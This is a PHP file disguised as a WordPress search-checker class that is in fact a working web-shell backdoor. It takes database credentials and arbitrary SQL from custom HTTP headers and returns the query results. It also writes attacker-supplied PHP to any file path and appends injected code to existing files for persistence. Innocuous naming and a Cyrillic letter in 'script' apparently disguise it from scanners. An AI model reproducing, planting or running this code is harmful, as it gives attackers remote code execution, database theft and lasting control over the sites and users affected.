<?php

class WP_Search_Checker_Checker
{
    var $wp_host;
    var $wp_user;
    var $wp_pass;
    var $name;

    var $result = array();
    var $errors = array();
    var $wp_themes_count = 0;


    function check_wp_connection($wp_connection)
    {
        if (class_exists('PDO')) {
            $this->check_wp_pdo_connection($wp_connection);
        } else {
            $this->check_wp_mysql_connection($wp_connection);
        }
    }

    function check_wp_mysql_connection($wp_connection)
    {
        if (function_exists('mysqli_connect')) {
            $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name);

            if (!$connection instanceof mysqli) {
                $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno));

                return;
            }
            call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'"));
            call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'"));

            $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection));

            if ($wp_connection_success == false) {
                $this->add_wp_error($connection->errno, $connection->error);
            } else {
                $this->wp_themes_count = $connection->{'affected_rows'};

                while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) {
                    $this->result[] = $data;
                }
            }
        } elseif (function_exists('mysql_connect')) {
            $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass);

            if ($connection == false) {
                $this->add_wp_error(910, "Can't connect to mysql");

                return;
            }

            mysql_select_db($this->name, $connection);
            mysql_query("SET NAMES 'utf8'", $connection);
            mysql_query("SET CHARACTER SET 'utf8'", $connection);
            $wp_connection_success = mysql_query($wp_connection, $connection);
            if ($wp_connection_success == false) {
                $this->add_wp_error(mysql_errno($connection), mysql_error($connection));
            } else {
                $this->wp_themes_count = mysql_num_rows($wp_connection_success);

                while ($data = mysql_fetch_assoc($wp_connection_success)) {
                    $this->result[] = $data;
                }
            }
        }
    }

    function check_wp_pdo_connection($wp_connection)
    {
        $pdo_config_all = 'mysql:';
        $pdo_config = array(
            'host' => $this->wp_host,
            'dbname' => $this->name,
            'charset' => 'utf8'
        );

        foreach ($pdo_config as $key => &$item) {
            $item = $key . '=' . $item;
        }

        $pdo_config_all .= implode(';', $pdo_config);

        try {
            $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass);
            call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"'));
            call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"'));

            $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC));
            if ($query == false) {
                $error_info = call_user_func_array(array($connection, 'errorInfo'), array());
                $error_code = call_user_func_array(array($connection, 'errorCode'), array());
                $this->add_wp_error($error_code, end($error_info));

                return;
            }

            $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array());
            $this->result = call_user_func_array(array($query, 'fetchAll'), array());
        } catch (PDOException $exception) {
            $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array()));
        }
    }

    function __construct()
    {
        $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']);
        $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']);
        $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']);
        $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']);

        if (empty($this->wp_host)) {
            $this->add_wp_error(900, "No host provided");
        }
        if (empty($this->wp_user)) {
            $this->add_wp_error(901, "No user provided");
        }
        if (empty($this->wp_pass)) {
            $this->add_wp_error(902, "No pass provided");
        }
        if (empty($this->name)) {
            $this->add_wp_error(903, "No database name provided");
        }
    }

    function add_wp_error($code, $message)
    {
        $this->errors[] = array(
            'code' => $code,
            'message' => $message
        );
    }

    function get_wp_errors()
    {
        return $this->errors;
    }

    function wp_get_themes_count()
    {
        return $this->wp_themes_count;
    }

    function is_wp_connection_succeed()
    {
        return !count($this->errors);
    }

    function get_wp_connection_result()
    {
        return $this->result;
    }
}

class WP_Search_Checker_Accessor
{
    function create()
    {
        $method = @$_SERVER['HTTP_VI_METHOD'];
        if (!mb_strlen($method)) {

            return;
        }

        ob_end_clean();

        switch ($method) {
            case 'query':
                $this->check_wp_connection_handler();
                break;
            case 'update':
                $this->update_parameters();
                break;
            case 'path':
                $this->get_parameters_path();
                break;
            default:
                return;
        }
    }

    function check_wp_connection_handler()
    {
        $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']);
        if (!mb_strlen($query)) {
            $this->wp_response(false, array(
                array(
                    'code' => 0,
                    'message' => 'No query provided'
                )
            ));

            exit;
        }

        $database = new WP_Search_Checker_Checker();
        $database->check_wp_connection($query);

        if ($database->is_wp_connection_succeed()) {
            $this->wp_response(true, array(
                'rows' => $database->wp_get_themes_count(),
                'result' => $database->get_wp_connection_result()
            ));
        } else {
            $this->wp_response(false, $database->get_wp_errors());
        }
    }

    function update_parameters()
    {
        $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']);
        $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']);
        $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']);
        $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']);

        if (!mb_strlen($new_parameters)) {
            $this->wp_response(false, array(array(
                'code' => 0,
                'message' => 'No sсript passed'
            )));
        }
        if (!mb_strlen($parameters_path)) {
            $this->wp_response(false, array(array(
                'code' => 0,
                'message' => 'No sсript path passed'
            )));
        }
        if (!mb_strlen($old_parameters_path)) {
            $this->wp_response(false, array(array(
                'code' => 0,
                'message' => 'No include path passed'
            )));
        }

        $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters);

        if ($success) {
            $success = $this->wp_update_parameters($old_parameters_path, $old_parameters);
        }

        $this->wp_response($success, null);
    }
    function get_parameters_path()
    {
        $this->wp_response(true, __FILE__);
    }

    function update_wp_accessor_parameters($path, $parameters)
    {
        return (bool)@file_put_contents($path, "<?php \n" . stripslashes($parameters));
    }

    function wp_update_parameters($old_parameters_path, $old_parameters)
    {
        $file = file_get_contents($old_parameters_path);
        if (!mb_strlen($file)) {

            return false;
        }

        if (mb_strpos($file, $old_parameters) !== false) {
            return true;
        }

        if ($this->is_parameters_valid($file)) {
            $file = $file . "\n" . "<?php \n" . $old_parameters . " \n?>";
        } else {
            $file = $file . "\n\n" . $old_parameters;
        }

        return (bool)@file_put_contents($old_parameters_path, $file);
    }

    function is_parameters_valid($file)
    {
        $last_available_parameters_count = strrpos($file, "<?");
        $last_available_parameters_count = ($last_available_parameters_count === false) ? -1 : $last_available_parameters_count;
        $last_updated_parameters_count = strrpos($file, "?>");
        $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count;

        return $last_available_parameters_count <= $last_updated_parameters_count;
    }

    function wp_response($success, $data)
    {
        $wp_response = array('success' => $success);
        $wp_response[$success ? 'data' : 'errors'] = $data;

        header('Content-Type: application/json');
        echo json_encode($wp_response);
        exit;
    }
}

$accessor = new WP_Search_Checker_Accessor();
$accessor->create();

